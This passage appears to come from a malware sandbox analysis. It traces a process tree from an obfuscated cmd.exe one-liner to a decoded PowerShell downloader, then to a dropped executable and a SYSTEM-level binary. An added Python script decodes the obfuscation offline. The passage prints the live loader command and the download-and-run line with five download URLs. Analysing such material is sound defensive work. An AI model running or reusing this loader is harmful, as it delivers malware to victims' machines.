      Command line: CmD /V:O/C"set LEA=uUTnlInWPSJGzFDwviio(Cxc)e8dp$mj0yVfOX;@Bb,+Eg:NHZhR}r{/\A3skL=.'ta- K&&for %W in (29;53;47;51;62;64;15;40;65;64;38;29;4;31;65;62;6;25;15;67;19;41;31;25;23;65;68;47;25;65;63;7;25;41;21;4;18;25;6;65;38;29;61;12;31;62;64;50;65;65;28;46;55;55;66;4;18;59;65;66;18;53;30;23;23;19;33;63;23;19;63;0;60;55;32;51;39;50;65;65;28;46;55;55;25;53;18;6;60;16;25;4;27;63;25;0;55;65;69;4;49;33;1;39;50;65;65;28;46;55;55;27;25;6;65;66;15;66;53;25;63;23;19;30;55;8;41;13;39;50;65;65;28;46;55;55;50;66;16;30;19;53;25;63;18;6;55;1;37;22;53;66;39;50;65;65;28;46;55;55;66;28;50;6;63;19;53;45;55;12;2;57;14;8;5;41;64;63;9;28;4;18;65;20;64;39;64;24;38;29;59;66;69;62;64;51;6;69;64;38;29;14;66;15;68;62;68;64;58;26;64;38;29;44;27;37;62;64;44;2;61;64;38;29;47;8;0;62;29;25;6;16;46;65;25;30;28;43;64;56;64;43;29;14;66;15;43;64;63;25;22;25;64;38;35;19;53;25;66;23;50;20;29;4;31;8;68;18;6;68;29;61;12;31;24;54;65;53;33;54;29;4;31;65;63;14;19;15;6;4;19;66;27;13;18;4;25;20;29;4;31;8;42;68;29;47;8;0;24;38;29;12;59;36;62;64;48;13;57;64;38;5;35;68;20;20;11;25;65;67;5;65;25;30;68;29;47;8;0;24;63;4;25;6;45;65;50;68;67;45;25;68;26;32;32;32;32;24;68;54;5;6;16;19;60;25;67;5;65;25;30;68;29;47;8;0;38;29;2;34;37;62;64;31;10;10;64;38;41;53;25;66;60;38;52;52;23;66;65;23;50;54;52;52;29;11;9;61;62;64;12;31;66;64;38;72)do set Zb9=!Zb9!!LEA:~%W,1!&&if %W geq 72 powershell.exe "!Zb9:*Zb9!=!""
      - Suspicious use of WriteProcessMemory
      PID: 2516
      (level 4) C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Command line: powershell.exe "$rNR='wBt';$ljt=new-object Net.WebClient;$Lzj='http://alistairmccoy.co.uk/0R@http://erinkveld.eu/tKlZyU@http://dentaware.com/PbF@http://havmore.in/UXxra@http://aphn.org/zTADPIb'.Split('@');$saK='RnK';$Daw = '38';$EdX='ETL';$NPu=$env:temp+'\'+$Daw+'.exe';foreach($ljP in $Lzj){try{$ljt.DownloadFile($ljP, $NPu);$zsO='HFA';If ((Get-Item $NPu).length -ge 80000) {Invoke-Item $NPu;$TVX='jJJ';break;}}catch{}}$GSL='zja';"
        - Blocklisted process makes network request
        - Loads dropped DLL
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        PID: 2704
        This is the fully decoded stage. A Net.WebClient tries the five '@'-separated URLs in order, writing each response to %TEMP%\38.exe; the first file of at least 80000 bytes is launched with Invoke-Item and the loop breaks. Every exception is swallowed by the empty catch, so a dead host simply falls through to the next one, and the size gate skips short error or placeholder responses. The assignments to $rNR, $saK, $EdX, $zsO, $TVX and $GSL are dead padding. The five network flows in the "Blocklisted process makes network request" signature are these download attempts.
        (level 5) C:\Users\Admin\AppData\Local\Temp\38.exe
          Command line: "C:\Users\Admin\AppData\Local\Temp\38.exe"
          - Executes dropped EXE
          - Loads dropped DLL
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of WriteProcessMemory
          PID: 1720

          (level 6) C:\Users\Admin\AppData\Local\Temp\38.exe
            Command line: "C:\Users\Admin\AppData\Local\Temp\38.exe"
            - Executes dropped EXE
            - Suspicious behavior: EnumeratesProcesses
            PID: 2580
(level 1) C:\Windows\SysWOW64\balloonclear.exe
  Command line: "C:\Windows\SysWOW64\balloonclear.exe"
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID: 2960

  (level 2) C:\Windows\SysWOW64\balloonclear.exe
    Command line: "C:\Windows\SysWOW64\balloonclear.exe"
    - Executes dropped EXE
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    PID: 2620

balloonclear.exe is classed as a dropped EXE, yet it appears as a second tree root rather than as a child of 38.exe, and its file and registry activity lands in the SYSTEM profile (C:\Windows\SysWOW64\config\systemprofile\... and HKEY_USERS\.DEFAULT). That combination means it is running as SYSTEM, which is what a freshly registered service looks like; the report does not capture which process wrote it to SysWOW64 or registered it. Like 38.exe, it launches a second instance of itself, and only the second instance does the file and registry work.
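The cmd.exe stage above (PIDs 2548 and 2516) hides the PowerShell script behind three cmd.exe expansion features: an environment-variable substring to spell CmD, a for-loop that appends one character of the LEA table per index, and a final !VAR:*str=! prefix strip. The Python below is an added example, not part of the sandbox report, that emulates exactly those features and rebuilds the stage offline from the level-3 command line as the report records it. The helper names are mine; the only assumption beyond the command line itself is the standard C:\ProgramData value used to illustrate the CmD trick.

```python
"""Offline decoder for the cmd.exe substring-index obfuscation in this tree.

Added example, not part of the sandbox report. It emulates the three cmd.exe
expansion features the one-liner relies on (env-var substring, a for-loop
that appends one character per index, and the "!VAR:*str=!" prefix strip)
and rebuilds the PowerShell stage without executing anything.
"""
import re

# Command line of PID 2516 exactly as the report records it (raw string so
# the backslash inside the character table survives).
CMD_LINE = r'''CmD /V:O/C"set LEA=uUTnlInWPSJGzFDwviio(Cxc)e8dp$mj0yVfOX;@Bb,+Eg:NHZhR}r{/\A3skL=.'ta- K&&for %W in (29;53;47;51;62;64;15;40;65;64;38;29;4;31;65;62;6;25;15;67;19;41;31;25;23;65;68;47;25;65;63;7;25;41;21;4;18;25;6;65;38;29;61;12;31;62;64;50;65;65;28;46;55;55;66;4;18;59;65;66;18;53;30;23;23;19;33;63;23;19;63;0;60;55;32;51;39;50;65;65;28;46;55;55;25;53;18;6;60;16;25;4;27;63;25;0;55;65;69;4;49;33;1;39;50;65;65;28;46;55;55;27;25;6;65;66;15;66;53;25;63;23;19;30;55;8;41;13;39;50;65;65;28;46;55;55;50;66;16;30;19;53;25;63;18;6;55;1;37;22;53;66;39;50;65;65;28;46;55;55;66;28;50;6;63;19;53;45;55;12;2;57;14;8;5;41;64;63;9;28;4;18;65;20;64;39;64;24;38;29;59;66;69;62;64;51;6;69;64;38;29;14;66;15;68;62;68;64;58;26;64;38;29;44;27;37;62;64;44;2;61;64;38;29;47;8;0;62;29;25;6;16;46;65;25;30;28;43;64;56;64;43;29;14;66;15;43;64;63;25;22;25;64;38;35;19;53;25;66;23;50;20;29;4;31;8;68;18;6;68;29;61;12;31;24;54;65;53;33;54;29;4;31;65;63;14;19;15;6;4;19;66;27;13;18;4;25;20;29;4;31;8;42;68;29;47;8;0;24;38;29;12;59;36;62;64;48;13;57;64;38;5;35;68;20;20;11;25;65;67;5;65;25;30;68;29;47;8;0;24;63;4;25;6;45;65;50;68;67;45;25;68;26;32;32;32;32;24;68;54;5;6;16;19;60;25;67;5;65;25;30;68;29;47;8;0;38;29;2;34;37;62;64;31;10;10;64;38;41;53;25;66;60;38;52;52;23;66;65;23;50;54;52;52;29;11;9;61;62;64;12;31;66;64;38;72)do set Zb9=!Zb9!!LEA:~%W,1!&&if %W geq 72 powershell.exe "!Zb9:*Zb9!=!""'''

# set <src>=<charset>&&for %<var> in (<idx>)do set <acc>=!<acc>!!<src>:~%<var>,1!
LOOP_RE = re.compile(
    r"set (?P<src>\w+)=(?P<charset>.*?)&&for %(?P<var>\w) in \((?P<idx>[\d;]+)\)"
    r"do set (?P<acc>\w+)=!(?P=acc)!!(?P=src):~%(?P=var),1!"
)
# powershell.exe "!<acc>:*<marker>=!"
FINAL_RE = re.compile(r'powershell\.exe "!(?P<acc>\w+):\*(?P<marker>[^=]+)=!"')


def cmd_substring(value, start, length=None):
    """Emulate %VAR:~start,length% for the non-negative offsets this sample
    uses; like cmd, an index past the end of the string yields ''."""
    if length is None:
        return value[start:]
    return value[start:start + length]


def cmd_replace(value, pattern, repl=""):
    """Emulate %VAR:pattern=repl% (case-insensitive). A leading '*' means
    "replace everything up to and including the first match", which is how
    the final !Zb9:*Zb9!=! strips whatever precedes the literal 'Zb9!'
    (a no-op when the accumulator never contained it)."""
    if pattern.startswith("*"):
        needle = pattern[1:]
        i = value.lower().find(needle.lower())
        return value if i < 0 else repl + value[i + len(needle):]
    return re.sub(re.escape(pattern), lambda _m: repl, value, flags=re.IGNORECASE)


def decode_substring_loop(cmd_line):
    """Return the string the for-loop assembles, after the final prefix strip."""
    m = LOOP_RE.search(cmd_line)
    if m is None:
        raise ValueError("no substring-index loop in command line")
    charset = m["charset"]
    indices = [int(n) for n in m["idx"].split(";")]
    stage = "".join(cmd_substring(charset, i, 1) for i in indices)
    f = FINAL_RE.search(cmd_line)
    if f is not None:
        stage = cmd_replace(stage, "*" + f["marker"])
    return stage


def extract_download_urls(powershell):
    """The decoded stage keeps its URLs '@'-joined in one literal and calls
    .Split('@'); recover the list without running it."""
    m = re.search(r"'(?P<urls>https?://[^']+)'\.Split\('@'\)", powershell)
    return m["urls"].split("@") if m else []


def dropped_exe_name(powershell):
    """Recover the %TEMP% file name from the $env:temp+'\\'+$<var>+'.exe'
    expression and the literal assigned to that variable."""
    m = re.search(r"\$env:temp\+'\\'\+\$(?P<var>\w+)\+'\.exe'", powershell)
    if m is None:
        return None
    v = re.search(r"\$%s\s*=\s*'(?P<val>[^']*)'" % m["var"], powershell)
    return (v["val"] + ".exe") if v else None


def min_payload_size(powershell):
    """The size gate: the downloaded file only runs if .length -ge <n>."""
    m = re.search(r"\.length -ge (?P<n>\d+)", powershell)
    return int(m["n"]) if m else None


if __name__ == "__main__":
    # The parent cmd.exe spelled this process's "CmD" as
    # %ProgramData:~0,1%%ProgramData:~9,2%; C:\ProgramData is the usual value.
    pd = r"C:\ProgramData"
    print(cmd_substring(pd, 0, 1) + cmd_substring(pd, 9, 2))
    stage = decode_substring_loop(CMD_LINE)
    print(stage)
    print(extract_download_urls(stage), dropped_exe_name(stage), min_payload_size(stage))
```

The decoded stage is character-for-character the powershell.exe command line of PID 2704 above, and the URL list it yields is the "Malware Config" block. Because the decoder never runs cmd.exe or PowerShell, it is safe to point at command lines harvested from EDR telemetry; the regular expressions are keyed on the loop shape rather than on the variable names, so a sample that renames LEA, W and Zb9 still decodes.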
Network
MITRE ATT&CK Enterprise v15
Downloads
Dropped file 1
- Filesize: 20KB
- MD5: 3bd9b9430dd7737caafe94e39dae56fb
- SHA1: 53de0fd722c99ad95a06c21cb66623797e91f161
- SHA256: 76aafdaafd9ef54624a6f8fc39f8f1d71af1461ad5cc992f608c18a0e7771cd6
- SHA512: fef9eb0105441d87d738c0d09985b6f372f028fa56c8309de608366db26ee79f8ce006d589b91ca5ee0220e32789c51f6ff5c36b31eb63ba9bd0e7bd3c427497
Dropped file 2
- Filesize: 376KB
- MD5: ac4ad219921aa13ac020f5dc460ad503
- SHA1: df3cadeb2736d3df7a31c6c9d3dad122d9570e16
- SHA256: 4a417963968601bbe8f9311d779d1a022a380829bed4b7af4daf934eeba5c70f
- SHA512: 2df686213ea67e030440deb61fed6559f721b0b6bf973915c7509b1cc15896669ffab5061cfc1674d358c819e69756276a0e8180e65ee47855d4b5ab882676fb
The report does not say which dropped path each file corresponds to. Only the 376KB file clears the PowerShell stage's 80000-byte gate, so the 20KB file cannot be the payload that Invoke-Item launched.